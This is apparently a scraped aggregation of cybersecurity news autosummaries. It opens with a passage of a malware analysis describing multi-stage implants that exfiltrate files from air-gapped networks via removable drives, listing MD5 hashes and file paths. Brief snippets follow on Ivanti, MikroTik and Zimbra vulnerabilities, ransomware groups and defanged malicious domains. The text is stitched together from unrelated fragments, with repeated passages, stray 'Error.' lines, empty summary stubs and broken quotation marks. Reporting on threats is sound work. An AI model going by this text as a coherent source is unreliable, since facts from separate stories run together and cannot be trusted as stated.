--2 , it restarts itself with parameter --1 , it restarts itself with parameter When run with parameter --1 , it starts the “msiexec.exe” process, reads and decrypts the payload, and injects it into the memory of the “msiexec.exe” process Once the payload starts to be executed in the memory of “msiexec.exe”, it runs into an endless loop consisting of 6 simple steps: Create folders for file storage (if they do not exist) and find the path to “WinRar.exe” Decrypt strings Read config and start searching for files on all disks Copy files and write log Archive copied files and clean up Sleep for 10 minutes Main loop of the implant designed to collect local files First, the implant creates the folder “C:\ProgramData\NetWorks”, then it creates one subfolder for temporary file storage (“C:\ProgramData\NetWorks\fl”) and one subfolder for archived data storage (“C:\ProgramData\NetWorks\ZZ”). The implant also checks “%TEMP%\TCABC8.tmp” for the following files that are used to infect a removable drive whose serial number matches the name of the folder: “mcods.exe”, which is a legitimate McAfee executable vulnerable to DLL hijacking “McVsoCfg.dll”, which is the second-step payload “DOC”, “PDF” or “DIR” files, which define the lure link file to be used It is obvious that the presence of the files mentioned above in the folder assigned to a specific removable drive indicates that the attackers first analyze the contents of removable drives for some time and only then copy the files used to infect a specific removable drive to the folder specified. Dedicated implant for gathering local files MD5 4C1ADC1778CE07CD655DB129AF1DA7E0 (DynTray.dll) 71D919105627C67AB9FB9A7152015CF6 (Data) Stack of implants used to exfiltrate data from air-gapped networks MD5 3E22E7F5A6EE0A7D3D9A5CBFA7939C98 (tmp.exe) 2DB858C4CA836120D3124EB5490195EA (main.ini) D2D7FD5C7372CD81D6BC4199F211A42C (RtkAudio.exe) 4D5963B7D931A02265EA5231961935E9 (mcvsocfg.dll) 3A532B8481F22B78ABC718AC5CDB3F06 (msgui.exe) 36A029CB62BFCB86394B49E5ACF36BEF (SCR) 1DBC1DEFC2AC6578D83D5C45D9836482 (abbyfine.exe) 9F402F0B2C84ED577E9EE76DCF640B70 (f04803w3.exe) 0E69850A0F67165D4E3D06987D14B2E6 (automonitor.exe) C929DCC69CF6546D56C2A68D31D7728D ($rjkdi4v.exe) Appendix II – MITRE ATT&CK Mapping File structure of a temp folder on an infected host and an infected removable drive Then, depending on the config and the extension (“DOC”, “PDF”, or “DIR”) of the file found in the temp directory, the main module recursively searches the drive’s root path for either a file (with the extension “.docx” or “.pdf”) or a folder. Fragment of the second-step worm, “McVsoCfg.dll” – removing itself from the infected drive Step 3 The third-step implant, “msgui.exe”, is quite small and simple – it is designed to execute a batch script with “cmd.exe” to collect data and save the output to the drive’s “$RECYCLE.BIN” folder so that it can be collected by the main module of the malware (when connected to the originally infected host). Fragment of the “msgui.exe” implant’s CMD commands used to gather information Fragment of the third-step malware, “msgui.exe”, designed to collect host info and run fourth-step malware (if it exists) Step 4 The fourth-step malware consists of two files: A simple dropper of the payload (similar to that used by second-step malware) Depending on their settings, both modules may collect information about a drive, as well as capture screenshots and window titles on the infected host, search for and copy documents (.doc, .docx, .xls, .xlsx, .ppt, .pptx) and images (.png, .jpeg, .jpg, .bmp). "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Key factors for effective security automation In this Help Net Security interview, Oliver Rochford, Chief Futurist at Tenzir, discusses how automation can be strategically integrated with human expertise, the challenges in ensuring data integrity, and the considerations when automating advanced tasks. Overcoming the cybersecurity talent shortage with upskilling initiatives In this Help Net Security interview, Dr. Lindsey Polley de Lopez, … More
The post Week in review: Ivanti zero-day exploited, MikroTik vulnerability could compromise 900,000 routers appeared first on Help Net Security.
"Autosummary:
US companies commit to safe, transparent AI development Seven US artificial intelligence (AI) giants – Amazon, Anthropic, Google, Inflection, Meta, Microsoft, and OpenAI – have publicly committed to “help move toward safe, secure, and transparent development of AI technology.” "Autosummary:
Bazan Group website shows an "Access Denied" error message (BleepingComputer) Cyber Avengers claims responsibility In a Telegram channel, Iranian hacktivist group, "Cyber Avengers" aka "CyberAv3ngers", has claimed responsibility for breaching BAZAN"s network. "Autosummary:
" N-days as effective as 0-days In 2022, many issues of this kind impacted Android, most notably CVE-2022-38181, a vulnerability in the ARM Mali GPU. "Autosummary:
These included diagrams of "Flare Gas Recovery Unit," "Amine Regeneration" system, a petrochemical "Splitter Section," and PLC code, as seen by BleepingComputer. "Autosummary:
The new vulnerability, tracked as CVE-2023-35081 (CVSS score: 7.8), impacts supported versions 11.10, 11.9, and 11.8, as well as those that are currently end-of-life (EoL). "Autosummary:
"Some of the users (operators) have multiple devices connected to their account, with some having as much as 30 devices they"ve been watching over a course of multiple years, spying on everyone in their lives," a security researcher, who goes by the name maia arson crimew, said. "Autosummary:
Other ransomware operations that utilize Linux ransomware encryptors, with most targeting VMware ESXi, include Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, and Hive. "Autosummary:
"Autosummary:
The study found that "Valid Accounts were the most common successful attack technique, responsible for 54% of successful attempts," followed by spear-phishing links (33.8%), spear-phishing attachments (3.3%), external remote services (2.9%), and drive-by compromises (1.9%). "Autosummary:
YouTube video promoting a CherryBlos carrier app (Trend Micro) The names used for the malicious APKs are GPTalk, Happy Miner, Robot999, and SynthNet, downloaded from the following websites with matching domain names: chatgptc[.]io happyminer[.]com robot999[.]net synthnet[.]ai A malicious Synthnet app was also uploaded onto the Google Play store, where it was downloaded roughly a thousand times before being reported and removed. "Autosummary:
Meanwhile, the restoration of the damaged IT infrastructure is still underway, likely now supported by a decryption key provided by NoEscape, and is expected to be completed by August 14th, 2023. "Autosummary:
"In examining management infrastructure associated with IcedID BC, we are also able to discern a pattern of multiple distinct accesses from users we assess to be both associated with the day to day operations of IcedID, and their affiliates who interact with victim hosts post-compromise," Team Cymru said. "Autosummary:
The novel attack technique, per Trellix, takes advantage of the "search-ms:" URI protocol handler, which offers the ability for applications and HTML links to launch custom local searches on a device, and the "search:" application protocol, a mechanism for calling the desktop search application on Windows. "Autosummary:
" CVE-2023-35078 was also exploited in the same attacks targeting Norwegian government entities as a zero-day, to steal personally identifiable information (PII), including names, phone numbers, and other mobile device details. "Autosummary:
Unknown backdoor found on hacked ESG appliances On Friday, CISA revealed that another new malware strain known as Submarine—and also tracked by Mandiant as DepthCharge—was found on the compromised appliances, a multi-component backdoor used for detection evasion, persistence, and data harvesting. "Autosummary:
Finally, we learned more about some recent attacks: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwareforme, @BleepinComputer, @LawrenceAbrams, @demonslay335, @struppigel, @DanielGallagher, @malwrhunterteam, @VK_Intel, @serghei, @fwosar, @Ionut_Ilascu, @FourOctets, @jorntvdw, @PolarToffee, @jgreigj, @BrettCallow, @SophosXOps, @eSentire, @vxunderground, @AlvieriD, and @pcrisk. "Categories: Exploits and vulnerabilities Categories: News Tags: Zimbra Tags: ZCS Tags: CVE-2023-38750 Tags: CISA Tags: CVE-2023-0464 Tags: TAG Tags: XSS Tags: JSP Tags: XML Tags: Zimbra has released ZCS 10.0.2 that fixes two security issues, including the known bug that could lead to exposure of internal JSP and XML files. |
The post Zimbra issues awaited patch for actively exploited vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
The Zimbra workaround suggests you apply the following fix manually on all of your mailbox nodes: Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto Then open to edit the active file and go to line number 40 Change <input name="st" type="hidden" value="${param.st}"/> to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/> Zimbra notes that a service restart is not required so you can apply the manual workaround without any downtime. "Digital threat actors are adopting evolving tactical behaviors, opting for different types of malicious attacks compared to previous years, according to SonicWall. Overall intrusion attempts were up, led by the highest year on record for global cryptojacking volume recorded by SonicWall, as threat actors shifted away from traditional ransomware attacks in favor of a stealthier means of malicious activities. The data suggests increased law enforcement activity, heavy sanctions and victims’ refusal to pay ransom demands … More
The post Cryptojacking soars as cyberattacks increase, diversify appeared first on Help Net Security.
"Autosummary:
Despite the decline in global ransomware attempts (-41%), a variety of other attacks have trended up globally, including cryptojacking (+399%), IoT malware (+37%) and encrypted threats (+22%). SonicWall identified a total of 172,146 never-before-seen malware variants in the first half of 2023, which is down (-36%) year-over-year, suggesting bad actors are spending less time on research and development, and more time on volume-based attacks – utilising open-source tools that may be less likely to be intercepted. "Autosummary:
"Autosummary:
"Based on the review of impacted files to date, [Maximus] believes those files contain personal information, including social security numbers, protected health information and/or other personal information, of at least 8 to 11 million individuals to whom the company anticipates providing notice of the incident," reads the SEC 8-K filing. "Autosummary:
From December 2023, listed firms are required to report details about "material" cyberattacks describing "the incident"s nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant. "Autosummary:
To make matters worse, Sophos said it found on prominent criminal marketplaces a "significant number of advertisements for, and discussion about, SEO poisoning, malvertising, and related services" as well as sellers offering compromised Google Ads accounts. "Autosummary:
"Autosummary:
Error. "Autosummary:
" Breached was a large hacking and data leak forum notorious for hosting, leaking, and selling data stolen from hacked companies, governments, and organizations worldwide. Purchase of the Breached "God" forum rank via Coinbase Source: BleepingComputer Breached and its members have been responsible for a wide range of hacks, extortion attempts, ransomware attacks, and the leaking of stolen data for many companies. "Categories: Exploits and vulnerabilities Categories: News Tags: Norwegian ministries Tags: ivanti Tags: EPMM Tags: MobileIron Tags: CVE-2023-35078 Tags: patch A patch is now available for an Ivanti EPMM vulnerability that was used in a cyberattack on the ICT platform which is relied upon by a dozen Norwegian ministries. |
The post Patch now! Ivanti Endpoint Manager Mobile Authentication vulnerability used in the wild appeared first on Malwarebytes Labs.
"Autosummary:
The CVE assigned to this vulnerability is: CVE-2023-35078 (CVSS score 10 out of 10): Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, allows remote attackers to obtain Personally Identifiable Information (PII), add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild. "In this Help Net Security interview, Dr. Lindsey Polley de Lopez, Director of Cyber & Space Intelligence at MACH37, proposes strategies for companies, educational institutions, and governments on how to address the ongoing shortage of cybersecurity talent through the introduction of upskilling initiatives. She also discusses creating a more diverse and inclusive talent pool capable of addressing complex problems in unconventional ways due to differing experiences. We hear a lot about the need for upskilling … More
The post Overcoming the cybersecurity talent shortage with upskilling initiatives appeared first on Help Net Security.
"Autosummary:
And for government employees, federal contractors, and US military service members, check out the Department of Homeland Security’s (DHS) FedVTE Program (which offers free online courses on topics like on topics such as ethical hacking and surveillance, risk management and malware analysis), as well as the USO & Skillsoft Partnership (which offers active duty members, spouses, and veterans unlimited access to a library of training and certification tools; sign-up via the USO Pathfinder Transition Program).At the federal level, the Cybersecurity and Infrastructure Security Agency’s (CISA) has a “Cybersecurity Workforce Training Guide” that helps early-career professionals plan a career pathway in cybersecurity, as well as a Cybersecurity Education and Training Assistance Program (CETAP) that helps teachers bring cybersecurity education into K–12 classrooms by providing worksheets, lesson plans, and notes that cover foundational concepts. When looking at the commercial sector, there are far too many initiatives to list, but a few key ones to be aware of include Microsoft’s national upskilling campaign (which includes free curriculum for community colleges – as well as free training for their professors – and Microsoft’s Cybersecurity Scholarship Program), the new Cyber Million Program launched this month by Accenture and Immersive Labs (which aims to fill 1 million entry-level cybersecurity jobs by offering free online courses), and free cybersecurity courses provided through Palo Alto Network’s Beacon platform.There are many efforts worldwide, including WOMCY (a nonprofit focused on growing opportunity for women in cybersecurity in Latin America), Women4Cyber (a foundation working to promote and support the participation of women in cybersecurity in Europe), Women in Cyber Mentorship Program (a program under the United Nations International When it comes to the consequences of the cybersecurity labor shortage, how does it impact company growth? "Autosummary:
The security hole, however, was not plugged until October 13, 2022, in the RouterOS stable version 6.49.7 and on July 19, 2023, for the RouterOS Long-term version 6.49.8. "Autosummary:
WVC1 has been developed to enhance the conventional video codec design, which relies on discrete cosine transform (DCT), a technique shared by other codecs such as H.261, H.263, MPEG-1, MPEG-2, and MPEG-4. "Autosummary:
BlackCat ransomware lists API calls for victim updates source: BleepingComputer The group also provided a crawler written in Python to help retrieve the latest information on the data leak site. "Autosummary:
Today, Sophos released a report on the Nitrogen campaign, detailing how it primarily targets technology and non-profit organizations in North America, impersonating popular software like AnyDesk, Cisco AnyConnect VPN, TreeSize Free, and WinSCP. "Autosummary:
"SeeMetrics launched its new Security Performance Boards. Organized by security domains, the new Security Performance Boards are a collection of out-of-the box metrics that empower security leaders to measure the performance of their technologies, processes, and people in real time. SeeMetrics is the first ever data platform that drives cybersecurity performance assessment directly from the operational stack and “inside the perimeter”. With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and … More
The post SeeMetrics Security Performance Boards empowers CISOs to validate security programs appeared first on Help Net Security.
"Autosummary:
With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and business-aligned view of measurements, metrics, and Key Performance Indicators (KPIs), which shows trends, risks, and historical context. "A privilege escalation vulnerability (CVE-2023-30799) could allow attackers to commandeer up to 900,000 MikroTik routers, says VulnCheck researcher Jacob Baines. While exploting it does require authentication, acquiring credentials to access the routers is not that difficult. “RouterOS [the underlying operating system] ships with a fully functional ‘admin’ user. Hardening guidance tells administrators to delete the ‘admin’ user, but we know a large number of installations haven’t,” Baines explained. “We probed a sample of hosts on … More
The post MikroTik vulnerability could be used to hijack 900,000 routers (CVE-2023-30799) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-30799 The interesting thing about CVE-2023-30799 is not that it’s a bug that allows elevation of privilege, but that it allow attackers to achieve “super-admin” privileges, which allows them to full access to the device’s OS and to, potentially, make undetectable changes to it. "Autosummary:
"Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report. "Autosummary:
"I think companies and investors alike, however, would benefit if this disclosure were made in a more consistent, comparable, and decision-useful way. "Autosummary:
Windows 11 KB5028254 preview update (BleepingComputer) Other highlights in Windows 11 KB5028254 Today"s preview release comes with additional fixes and improvements, with some of the most significant ones outlined below: This update addresses an issue in the Windows Notification Platform. "The Securities and Exchange Commission (SEC) today adopted rules requiring registrants to disclose material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance. The Commission also adopted rules requiring foreign private issuers to make comparable disclosures. “Whether a company loses a factory in a fire — or millions of files in a cybersecurity incident — it may be material to investors,” said SEC … More
The post SEC adopts new cybersecurity incident disclosure rules for companies appeared first on Help Net Security.
"Autosummary:
The new rules also add Regulation S-K Item 106, which will require registrants to describe their processes, if any, for assessing, identifying, and managing material risks from cybersecurity threats, as well as the material effects or reasonably likely material effects of risks from cybersecurity threats and previous cybersecurity incidents. "Autosummary:
"Autosummary:
Error. "Categories: Business Tags: ransomware Tags: blackbyte Tags: Akira Tags: group Tags: compromised Tags: data Tags: blackmail Tags: extortion Tags: attack Tags: Yamaha Tags: Canada Tags: music Tags: audio We take a look at claims that Yamaha has been compromised by two unrelated ransomware groups. |
The post Ransomware groups claim responsibility for double-attack on Yamaha appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.From our post: Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing.When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files. "Autosummary:
WVC1 has been developed to enhance the conventional video codec design, which relies on discrete cosine transform (DCT), a technique shared by other codecs such as H.261, H.263, MPEG-1, MPEG-2, and MPEG-4. "In the Q2 2023, GuidePoint Research and Intelligence Team (GRIT) tracked 1,177 total publicly posted ransomware victims claimed by 41 different threat groups. The most impacted industries GRIT’s report shows a 38% increase in public ransomware victims compared to Q1 2023, and a startling 100% increase from Q2 2022. Manufacturing and technology, representing 14% and 11% of impacted industries respectively, continue to be the most impacted industries, a trend that has persisted from GRIT’s observations … More
The post RaaS proliferation: 14 new ransomware groups target organizations worldwide appeared first on Help Net Security.
"Autosummary:
“Reduced barriers to entry afforded by the Crimeware-as-a-Service and Ransomware-as-a-Service economies will almost certainly encourage more entrants going forward, and though the re-use of historical malware and ransomware provides an advantage for well-prepared and resourced defenders, smaller or less-resourced organizations will face an increased risk from the greater volume of threats,” Schmitt continued. "Autosummary:
"An attacker with access to these API paths can access personally identifiable information (PII) such as names, phone numbers, and other mobile device details for users on a vulnerable system," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned in an advisory published on Monday. "In software development, the importance of secure coding practices cannot be overstated. Fostering a security culture within development teams has become crucial to ensure the integrity and protection of digital systems. To delve deeper into this topic, we had the opportunity to interview Pieter Danhieux, CEO at Secure Code Warrior. He sheds light on the significance of positive security culture, the reasons behind recurrent vulnerabilities, strategies for incorporating secure coding training without hampering development processes, … More
The post Inspiring secure coding: Strategies to encourage developers’ continuous improvement appeared first on Help Net Security.
"Autosummary:
He sheds light on the significance of positive security culture, the reasons behind recurrent vulnerabilities, strategies for incorporating secure coding training without hampering development processes, the effectiveness of gamified learning experiences, the need for the regular refreshment of secure development training, and innovative methods to encourage developers to improve their secure coding techniques. Resentment can be strong between both teams, but fostering a positive security culture where developers understand the role they can play in driving down code-level vulnerabilities, as well as creating an environment where they can learn secure coding in a way that is comfortable for them, is paramount in repairing that relationship.We now write code for different purposes: full-stack, embedded, mobile, APIs… and security vulnerabilities exist in most of those technologies in different forms, requiring diverse coding patterns and approaches. "Autosummary:
"Autosummary:
"A zero-day vulnerability (CVE-2023-35078) affecting Ivanti Endpoint Manager Mobile (EPMM) has been exploited to carry out an attack that affected 12 Norwegian ministries, the Norwegian National Security Authority (NSM) has confirmed on Tuesday. What is known about the attacks? On Monday, the Norwegian government said that the attack was detected on the ICT platform used by the 12 ministries, though it did not name the platform at the time. The ICT platform – now confirmed … More
The post Ivanti zero-day exploited to target Norwegian government (CVE-2023-35078) appeared first on Help Net Security.
"Autosummary:
A zero-day vulnerability (CVE-2023-35078) affecting Ivanti Endpoint Manager Mobile (EPMM) has been exploited to carry out an attack that affected 12 Norwegian ministries, the Norwegian National Security Authority (NSM) has confirmed on Tuesday. “An attacker with access to these API paths can access personally identifiable information (PII) such as names, phone numbers, and other mobile device details for users on a vulnerable system. "Apple has patched an exploited zero-day kernel vulnerability (CVE-2023-38606) in iOS, iPadOS, macOS, watchOS and tvOS. CVE-2023-38606 fix has been backported In early July, Apple fixed an actively exploited zero-day vulnerability (CVE-2023-37450) in WebKit. The vulnerability has been patched via a Rapid Security Response update in iOS 16.5.1 and iPadOS 16.5.1, macOS Ventura 13.4.1, and in Safari (16.5.2) via a regular update, thus also delivering the fix to users of older macOS versions (macOS Big … More
The post Apple fixes exploited zero-day in all of its OSes (CVE-2023-38606) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
2023: The year of data privacy laws Legislation moves slowly, but in 2023 almost all five of the below regulations will take effect, making it a huge year for state data privacy acts. Password security protects your business and customers Compromised passwords can lead to potential infrastructure vulnerabilities and the loss of customer data, which may violate different state data protection regulations.Connecticut (CTDPA) Businesses processing data of at least 25,000 consumers and services at least 50% of gross revenues from selling data or 100,000 consumers, excluding purely patent transactions. "Autosummary:
More specifically, Flare found the following in the examined stealer logs: 179,000 AWS Console credentials 2,300 Google Cloud credentials 64,500 DocuSign credentials 15,500 QuickBooks credentials 23,000 Salesforce credentials 66,000 CRM credentials In addition to the above, there are about 48,000 logs that include access to "okta.com," an enterprise-grade identity management service used by organizations for cloud and on-premise user authentication. "Panorays announced two capabilities – Supply Chain Discovery and Risk Insights and Response Portal. These new additions empower organizations to gain comprehensive visibility into their digital supply chains and effectively manage potential cybersecurity risks posed by third, fourth, and Nth party vendors. To address the growing risks of digital supply chains, originating from vendors beyond immediate third parties, Panorays is releasing its Supply Chain Discovery solution. This tool automates the identification of a company’s digital … More
The post Panorays unveils cybersecurity enhancements for supply chains appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The script, for its part, is engineered to download and execute a second-stage payload named FULLHOUSE.DOORED, using it as a conduit to deploy additional malware such as STRATOFEAR and TIEDYE, after which the prior payloads were removed from the system in an attempt to cover up the tracks - FULLHOUSE.DOORED - A C/C++-based first-stage backdoor that communicates using HTTP and comes with support for shell command execution, file transfer, file management, and process injection - A C/C++-based first-stage backdoor that communicates using HTTP and comes with support for shell command execution, file transfer, file management, and process injection STRATOFEAR - A second-stage modular implant that"s chiefly designed to gather system information as well as retrieve and execute more modules from a remote server or loaded from disk - A second-stage modular implant that"s chiefly designed to gather system information as well as retrieve and execute more modules from a remote server or loaded from disk TIEDYE - A second-stage Mach-O executable that can communicate with a remote server to run additional payloads, harvest basic system information, and execute shell commands TIEDYE is also said to exhibit similarities to RABBITHUNT, a backdoor written in C++ that communicates via a custom binary protocol over TCP and which is capable of reverse shell, file transfer, process creation, and process termination. "The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server," Phylum said in a new analysis detailing the discovery of new npm modules used in the same campaign. "Autosummary:
Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malware, alongside scripts that leverage living-off-the-land (LotL) techniques to fingerprint the host and gather system metadata. "Autosummary:
BlackBerry MDR The defining characteristics of the BlackBerry® MDR service, CylanceGUARD®, are best expressed in terms of its people, process, and technology.He manages people, strategy, roadmaps, and go-to-market for P&L business, delivering new technologies and user experiences across enterprise and consumer products.Additionally, he built and developed product management, marketing, and business operations teams, overseeing 3 to 15 direct staff and indirectly influencing over 30 to 400+ R&D staff. "Autosummary:
The malware, first discovered by security researcher iamdeadlyz, is distributed to both Windows and macOS users in the form of fake blockchain games using names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend. "Autosummary:
Outlook "trying to connect" dialog box (Microsoft) While Outlook, Office, and Windows Teams are still investigating the issue and working on a fix, Redmond provided a temporary solution for impacted users. "Autosummary:
Decoy Dog was discovered in early April after Infoblox specialists found anomalous DNS beaconing activity from half a dozen domains that acted as command and control (C2) servers for the malware: cbox4[.]ignorelist[.]com claudfront[.]net hsdps[.]cc ads-tm-glb[.]click atlas-upd[.]com allowlisted[.]net At the time, the researchers said that they “found the identical DNS query patterns arising from enterprise networks, which could not be tied to consumer devices” and “confirmed that the queries originated from network appliances in a very limited number of customer networks.” Several Decoy Dog controllers source: Infoblox Highly targeted malware with short list of victims Based on passive DNS traffic analysis, it is difficult to determine an accurate number of Data Dog clients, which would indicate impacted devices, but the largest number of active concurrent connections that Infoblox observed on any one controller was less than 50 and the smallest was four. However, additional research is required to determine the targets, the initial compromise method (e.g. supply chain, known vulnerability, zero-day in targeted devices), and how actors move into the network. "Autosummary:
TAS for VMs helps enterprises automate the deployment of applications across on-premises or public and private clouds (e.g., vSphere, AWS, Azure, GCP, OpenStack). "Autosummary:
" A large-scale problem The Mikrotik CVE-2023-30799 vulnerability was first disclosed without an identifier in June 2022, and MikroTik fixed the issue in October 2022 for RouterOS stable (v6.49.7) and on July 19, 2023, for RouterOS Long-term (v6.49.8). "Autosummary:
MobileIron user portals exposed on the Internet (Shodan) Federal agencies ordered to patch by August 15 U.S. Federal Civilian Executive Branch Agencies (FCEB) have a three-week deadline, until August 15th, to secure their devices against attacks targeting the CVE-2023-35078 flaw, which was added to CISA"s list of Known Exploited Vulnerabilities on Tuesday. "Autosummary:
The malware, first discovered by security researcher iamdeadlyz, is distributed to both Windows and macOS users in the form of fake blockchain games using names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend. "Categories: News Categories: Ransomware Tags: Tampa Tags: General Hospital Tags: Snatch Tags: ransomware Tags: RDP Tags: data breach The Tampa General Hospital has promised to reach out to the individuals whose information has been stolen by the Snatch ransomware group. |
The post Tampa General Hospital half thwarts ransomware attack, but still loses patient data appeared first on Malwarebytes Labs.
"Autosummary:
The information varied from person to person, but may have included names, addresses, phone numbers, dates of birth, Social Security numbers (SSNs), health insurance information, medical record numbers, patient account numbers, dates of service and/or limited treatment information used by TGH for its business operations.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Their most common attack vectors include brute-force attacks against vulnerable, exposed services such as RDP, VNC (Virtual Network Computing), and TeamViewer. "In this Help Net Security interview, Debbie Gordon, CEO of Cloud Range explains the concept of a cyber range, its crucial role in preparing for real-world cyber threats, and the importance of realism in cyber training scenarios. Gordon also discusses how cyber ranges facilitate the identification of vulnerabilities and provides advice on maximizing the benefits of cyber range training. Finally, she talks about the resources needed for a robust cyber range environment and the future … More
The post Bridging the cybersecurity skills gap through cyber range training appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Debbie Gordon, CEO of Cloud Range explains the concept of a cyber range, its crucial role in preparing for real-world cyber threats, and the importance of realism in cyber training scenarios. Alternatively, most organizations are opting for a cyber range-as-a-service platform which will take care of all the management and facilitation for you, including range customization, scenario development, and administration.A quality platform can be customized to use different SIEMs, firewalls, EDRs, IDSs, and more, so the team is using the same tools they use every day.Furthermore, scenarios should map to the NICE Framework, adjusting as necessary for each organization, to guarantee that everyone thoroughly understands the knowledge, skills, and abilities (or competencies) required for their role.That’s why CISOs, VPs, and security leaders are prioritizing finding individuals with forward-thinking abilities such as problem-solving, leadership, and agility. "IBM released its annual Cost of a Data Breach Report, showing the global average cost of a data breach reached $4.45 million in 2023 – an all-time high for the report and a 15% increase over the last 3 years. Detection and escalation costs jumped 42% over this same time frame, representing the highest portion of breach costs and indicating a shift towards more complex breach investigations. According to the report, businesses are divided in … More
The post Average cost of a data breach reaches $4.45 million in 2023 appeared first on Help Net Security.
"Autosummary:
In fact, studied organizations that deployed security AI and automation extensively saw, on average, nearly $1.8 million lower data breach costs than organizations that didn’t deploy these technologies – the biggest cost saver identified in the report. Every second costs According to the 2023 report, studied organizations that fully deploy security AI and automation saw 108-day shorter breach lifecycles on average compared to organizations not deploying these technologies – and experienced significantly lower incident costs. "Autosummary:
"While browsing through ssh-agent"s source code, we noticed that a remote attacker, who has access to the remote server where Alice"s ssh-agent is forwarded to, can load (dlopen()) and immediately unload (dlclose()) any shared library in /usr/lib* on Alice"s workstation (via her forwarded ssh-agent, if it is compiled with ENABLE_PKCS11, which is the default)," Qualys explained. "Autosummary:
"Over the past four and a half years, the Russian-speaking group Red Curl [...] has carried out at least 34 attacks on companies from the UK, Germany, Canada, Norway, Ukraine, and Australia," the company said. "Autosummary:
"Autosummary:
The flaws, discovered by Mandiant on February 28, 2023, have been assigned the identifiers CVE-2023-26077 and CVE-2023-26078, with the issues remediated in versions 1.8.3.7 and 1.8.4.9 released by Atera on April 17, 2023, and June 26, 2023, respectively. "Autosummary:
"Autosummary:
Next, Lazarus uses the "JuicyPotato" privilege escalation malware ("usopriv.exe") to gain higher-level access to the compromised system. "Autosummary:
They also target unsupported and end-of-life software versions lower than 11.8.1.0 (e.g., 11.7.0.0, 11.5.0.0) While Ivanti has published a security advisory to provide details on the security vulnerability, the information is being blocked by a login, given that the article can only be accessed with an account linked to Ivanti customer information. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Citrix ADC zero-day exploitatation: CISA releases details about attack on CI organization (CVE-2023-3519) The exploitation of the Citrix NetScaler ADC zero-day vulnerability (CVE-2023-3519) was first spotted by a critical infrastructure organization, who reported it to the Cybersecurity and Infrastructure Security Agency (CISA). North Korean hackers targeted tech companies through JumpCloud and GitHub North Korean state-sponsored hackers have been linked to … More
The post Week in review: VirusTotal data leak, Citrix NetScaler zero-day exploitation appeared first on Help Net Security.
"Autosummary:
Trends in ransomware-as-a-service and cryptocurrency to monitor While most cryptocurrency is traceable, many ransomware operators perform their misdeeds from countries with governments who tend to look the other way, especially if the attacks don’t target the country they are operating from What to do (and what not to do) after a data breach In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses what we should do – and not do – in the wake of a data breach. CISOs under pressure: Protecting sensitive information in the age of high employee turnover In this Help Net Security interview, Charles Brooks, Adjunct Professor at Georgetown University’s Applied Intelligence Program and graduate Cybersecurity Programs, talks about how zero trust principles, identity access management, and managed security services are crucial for effective cybersecurity, and how implementation of new technologies like AI, machine learning, and tracking tools can enhance supply chain security. "Autosummary:
Stolen RDP credentials sold on dark web marketplace Due to this widespread abuse, law enforcement has been actively targeting stolen credential marketplaces in law enforcement operations, seizing the WT1SHOP in 2022, and, more recently, taking down the Genesis Market.Even worse, these stolen accounts can be used to access corporate networks, allowing the hackers to spread laterally on a network to conduct BEC scams, data theft, supply chain attacks, and ransomware attacks. "Autosummary:
Battery usage per app on Windows 11"s energy page In addition, the page includes a section for "battery usage per app", allowing users to select between “Total usage”, “In use”, “Background”, and “Name”. "U.S. enterprises are responding to growing cybersecurity threats by working to make the best use of tools and services to ensure business resilience, according to ISG. Enterprises face growing cybersecurity threats The report for the U.S. finds that the U.S. security landscape changed significantly in 2022, with breaches declining in number but increasing in size and the federal government tightening compliance rules. Many organizations began to improve visibility and risk management to better protect themselves … More
The post CISOs are making cybersecurity a business problem appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks, according to Gcore. The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in Q2/Q3 was seven days, 16 hours, and 22 minutes. … More
The post Attackers intensify DDoS attacks with new tactics appeared first on Help Net Security.
"Autosummary:
